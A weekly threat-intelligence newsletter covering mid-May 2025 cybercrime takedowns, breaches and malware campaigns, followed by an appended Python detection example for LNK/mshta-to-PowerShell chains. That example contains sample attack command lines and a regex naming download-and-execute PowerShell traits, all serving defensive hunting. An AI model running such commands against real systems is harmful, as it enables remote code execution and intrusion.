VerSprite Weekly Threat Intelligence
Date Range: 12 May 2025 – 16 May 2025
Issue: 14th Edition
Security Triumphs of the Week
This week, cybercriminals took heavy hits across the globe! The infamous LockBit ransomware gang was breached, leaking insider secrets and crippling its operations. U.S. authorities dismantled a major botnet and charged Russian operators, while Germany shut down a $1.9B crypto laundering platform, seizing millions and 8TB of data. Telegram cracked down on black market channels, and Europol busted a massive cyber fraud syndicate targeting European banks.
- LockBit Ransomware Gang Hacked – Internal Data Leaked
One of the world’s most notorious ransomware gangs, LockBit, has suffered another major breach. Leaked internal data reveals affiliate structures, operational methods, negotiation tactics, and internal communications. The breach not only damages LockBit’s credibility but provides a goldmine of threat intelligence for defenders. This event could significantly hinder their operations moving forward.
Read full article: Analyst1
- U.S. Takes Down Botnet, Charges Russian Operators
The U.S. Department of Justice announced the takedown of a major botnet and filed criminal charges against its alleged Russian administrators. This botnet was involved in large-scale credential theft, malware distribution, and cyber fraud. These actions reflect ongoing efforts to hold foreign threat actors accountable and disrupt international cybercrime infrastructure.
Read full article: Securityweek
- Germany Shuts Down eXch Crypto Platform – $1.9B Laundering Operation Crushed
German authorities dismantled the eXch cryptocurrency platform that was allegedly used to launder over $1.9 billion. Along with the seizure of €34 million in crypto, investigators also confiscated 8TB of critical data. This takedown severely impacts dark web finance operations and reveals valuable insights into cybercrime funding structures.
Read full article: Thehackernews
- Telegram Blocks Two Massive Black-Market Channels
Telegram has taken decisive action by blocking two major black-market services operating on its platform. These services, which facilitated illegal sales of data and tools, were warned and forced to shut down. This rare enforcement move shows Telegram responding to growing pressure to curb cybercrime on its app.
Read full article: Reuters
- Europol Busts Major Cyber Fraud Syndicate
Europol led a coordinated crackdown on a large-scale cyber fraud ring that targeted banks and individuals across Europe. The operation resulted in multiple arrests, asset seizures, and the dismantling of critical infrastructure. This marks another significant win in the fight against financial cybercrime and organized fraud.
Read full article: Scworld
Security Setbacks of the Week
This week saw a diverse set of significant cybersecurity breaches impacting government infrastructure, healthcare providers, major tech vendors, and even international airlines. Third-party risk, supply chain weaknesses, and the increasing intersection of geopolitics with healthcare were evident across incidents. Ransomware operations continued to disrupt critical services, while exploitation of trusted communication platforms raised red flags about abuse potential in digital government services.
- U.S. Government Alert System Hijacked to Distribute Scam Links
The GovDelivery platform, used by over 1,000 government agencies, was exploited to send credential-stealing phishing emails that appeared legitimate due to the system’s trusted .gov domain. Attackers leveraged an email template testing feature to blast out scam messages, exploiting a misconfiguration or potential design flaw in the system. This raises serious concerns about third-party service security in government infrastructure.
Read full article: TechCrunch
- Idaho Hospital Breach Exposes 34,000 Individuals’ Sensitive Data
Idaho-based Mountain View Hospital disclosed a breach affecting over 34,000 people, involving the unauthorized access to full names, Social Security Numbers, and protected health information. The breach, which occurred in late March 2025, highlights the healthcare sector’s ongoing struggle to safeguard personal data against evolving cyber threats.
Read full article: Comparitech
- Broadcom Employee Data Compromised via Third-Party Vendor
A third-party breach at benefits administrator Alight Solutions resulted in the theft of sensitive Broadcom employee data. The information exposed includes names, Social Security Numbers, and possibly more. While Broadcom itself wasn’t directly breached, the incident underscores the inherent risks in the supply chain and third-party data management.
Read full article: The Register
- South African Airways Hit by ‘INC Ransomware’ Gang
A ransomware group known as INC claimed responsibility for a recent attack on South African Airways. The gang published stolen data samples, suggesting successful exfiltration and encryption operations. The breach affected flight operations and internal systems, adding to the growing list of ransomware incidents targeting the aviation sector globally.
Read full article: Comparitech
- Russian Hospital Disrupted by Alleged Western Cyberattack
A hospital in the Russian city of Voronezh was forced to shut down IT operations following a cyberattack allegedly tied to Western threat actors. The attack impacted patient records and medical equipment functionality, significantly disrupting healthcare services. Attribution remains murky, but the geopolitical context suggests increasing cyber hostilities involving healthcare targets.
Read full article: The Record
The New Emerging Threats
From stealthy fileless RATs to state-backed espionage, this week’s cyber landscape is packed with red flags. The Remcos RAT resurfaces using LNK and MSHTA in a fileless PowerShell attack, while TransferLoader enables full command execution on infected systems. A serious supply chain breach dropped the SnipVex and XRed malware into printer software downloads. Meanwhile, Fancy Bear is back, targeting top Ukrainian officials, and ClickFix exploits are being tested against Linux systems.
- Fileless Remcos RAT Delivered via LNK and MSHTA
A new attack campaign is leveraging Windows shortcut (LNK) files and MSHTA to deploy a fileless variant of the Remcos RAT. The malware uses PowerShell to establish persistence and remote access without dropping visible files on disk, making it harder to detect. This technique bypasses traditional defenses and highlights the need for advanced behavioral detection.
Read full article: Thehackernews
- SnipVex and XRed Malware Found in Procolored Printer Software
Security researchers have uncovered two malware strains — SnipVex and XRed — embedded in official downloads from Procolored, a printer vendor. These malicious tools include a clipbanker and a backdoor, active for over six months on the vendor’s site. This supply chain compromise threatens unsuspecting users who downloaded legitimate-looking printer drivers.
Read full article: Securityonline
- Fancy Bear Targets Ukrainian Officials in Espionage Campaign
Russia-linked APT group Fancy Bear (APT28) has been conducting a new campaign aimed at stealing emails from high-ranking Ukrainian officials and defense contractors. This ongoing espionage operation highlights the group’s continued interest in Ukrainian intelligence, especially during heightened geopolitical tensions. The operation likely includes spear-phishing and credential harvesting tactics.
Read full article: Cyberscoop
- ClickFix Exploits Under Test Against Linux Systems
Researchers have spotted attackers experimenting with a new exploit technique called ClickFix, initially targeting Windows but now being tested against Linux. The attack abuses UI event handlers in desktop environments to trigger unauthorized actions. While not yet widespread, this cross-platform threat is a red flag for Linux system admins.
Read full article: Bleepingcomputer
- TransferLoader Malware Enables Command Execution on Infected Hosts
A newly identified malware called TransferLoader allows attackers to execute arbitrary commands on compromised machines. Delivered through fake software or phishing vectors, it connects to C2 servers to exfiltrate data and receive attacker instructions. This malware is modular, adaptable, and poses significant risks to both individuals and organizations.
Read full article: Gbhackers
In-Depth Expert CTI Analysis
This week illustrated the powerful reach of international collaboration against cybercrime, with multiple law enforcement victories. Simultaneously, the threat landscape evolved across ransomware, espionage, and supply chain vulnerabilities. While law enforcement agencies dealt significant blows to cybercriminals, critical sectors including healthcare, aviation, and government services faced major disruptions due to data breaches and operational attacks.
Proactive Defense and Strategic Foresight
Global law enforcement cooperation is paying off. The takedown of LockBit’s infrastructure and large-scale botnets signals that threat actors can be reached even across borders. These developments should inspire organizations to:
- Strengthen cooperation with cybercrime units and ISACs.
- Review threat models with updated TTPs based on LockBit leaks.
- Increase monitoring of C2 domains and leaked affiliate indicators.
Evolving Ransomware and Malware Tactics
Ransomware actors are adapting, but internal exposure is weakening their grip. The LockBit leaks revealed operational details and affiliate networks, giving defenders a unique intelligence opportunity.
- INC ransomware’s attack on South African Airways reiterates that aviation and transport sectors remain high-value targets.
- Fileless malware like the Remcos RAT, using LNK + MSHTA evasion techniques, bypasses traditional defenses, highlighting the need for behavior-based detection.
- Supply chain attacks like SnipVex/XRed in printer drivers show that even non-core applications can be exploited.
State-Sponsored and Organized Cybercrime Convergence
The return of Fancy Bear underscores the persistent threat posed by state-sponsored groups. Cybercriminal and APT behaviors continue to overlap in sophistication and targets.
- APT28 targeting Ukrainian officials reflects continued espionage motives amidst geopolitical conflicts.
- Alleged Western-sourced attacks on Russian healthcare systems indicate cyberwarfare spilling into civilian infrastructure.
- Financial fraud rings disrupted by Europol show traditional crime increasingly adopting cyber tactics.
Operational and Tactical Implications
Organizations should assume compromise not just from direct attacks but from third-party vendors, supply chains, and overlooked assets:
- Broadcom’s data exposure via Alight Solutions emphasizes the need to assess third-party security controls.
- Misuse of GovDelivery’s trusted email domain highlights the risk of service abuse even when infrastructure seems secure.
- Fileless, stealthy infections require updated detection strategies, such as EDR with memory analysis and script behavior tracking.
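Added example (not from the newsletter or any report it cites): a small hunt over constructed Sysmon-style process-creation events for the explorer.exe -> mshta.exe -> powershell.exe chain that an LNK lure produces, which is the behavioral signal the Remcos item above and the EDR script-tracking point in this list call for. The event fields, pids, paths and the placeholder URL are assumptions made for the example.

```python
"""Hunt for the explorer.exe -> mshta.exe -> powershell.exe chain that an LNK lure
produces, over Sysmon-style process-creation events. Added example; data is constructed."""
import ntpath
import re

# Command-line traits that make a PowerShell child of mshta.exe worth an alert.
SUSPICIOUS_PS = re.compile(
    r"(?i)(-enc(odedcommand)?\s|-w(indowstyle)?\s+hidden|-nop|bypass|iex\b|downloadstring)"
)

# Constructed sample events, shaped like Sysmon Event ID 1 / EDR process telemetry.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    # Double-clicking the LNK makes explorer.exe run the shortcut target: mshta.exe.
    {"pid": 512, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe http://placeholder.invalid/stage.hta"},
    # The HTA script then spawns hidden, encoded PowerShell: nothing is written to disk.
    {"pid": 640, "ppid": 512, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -enc <base64-placeholder>"},
    # Benign admin PowerShell launched straight from the shell; must not alert.
    {"pid": 700, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -File C:\scripts\backup.ps1"},
]

def process_name(event):
    return ntpath.basename(event["image"]).lower()

def ancestry(by_pid, pid, max_depth=10):
    """Return [self, parent, grandparent, ...] names; depth-bounded and cycle-safe."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen and len(chain) < max_depth:
        seen.add(pid)
        chain.append(process_name(by_pid[pid]))
        pid = by_pid[pid]["ppid"]
    return chain

def find_mshta_powershell_chains(events):
    """Flag PowerShell processes with mshta.exe anywhere in their ancestry."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if process_name(e) not in ("powershell.exe", "pwsh.exe"):
            continue
        chain = ancestry(by_pid, e["pid"])
        if "mshta.exe" in chain[1:]:
            alerts.append({"pid": e["pid"], "chain": " -> ".join(reversed(chain)),
                           "flags": len(SUSPICIOUS_PS.findall(e["cmd"]))})
    return alerts
```

The "flags" count ranks hits by how many evasion switches the PowerShell command line carries, so a bare mshta-spawned PowerShell still surfaces with a lower score rather than being missed.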
Forward-Looking Recommendations
Security leaders should prioritize the following:
- Leverage leaked LockBit data to hunt for IOCs and refine threat detection models.
- Conduct tabletop exercises simulating ransomware impacts on aviation, healthcare, and government systems.
- Adopt Zero Trust principles for vendors and digital services, limiting blast radius in case of compromise.
- Harden Linux environments as ClickFix and similar exploits move cross-platform.
- Monitor Telegram and similar platforms for dark market activity resurgence.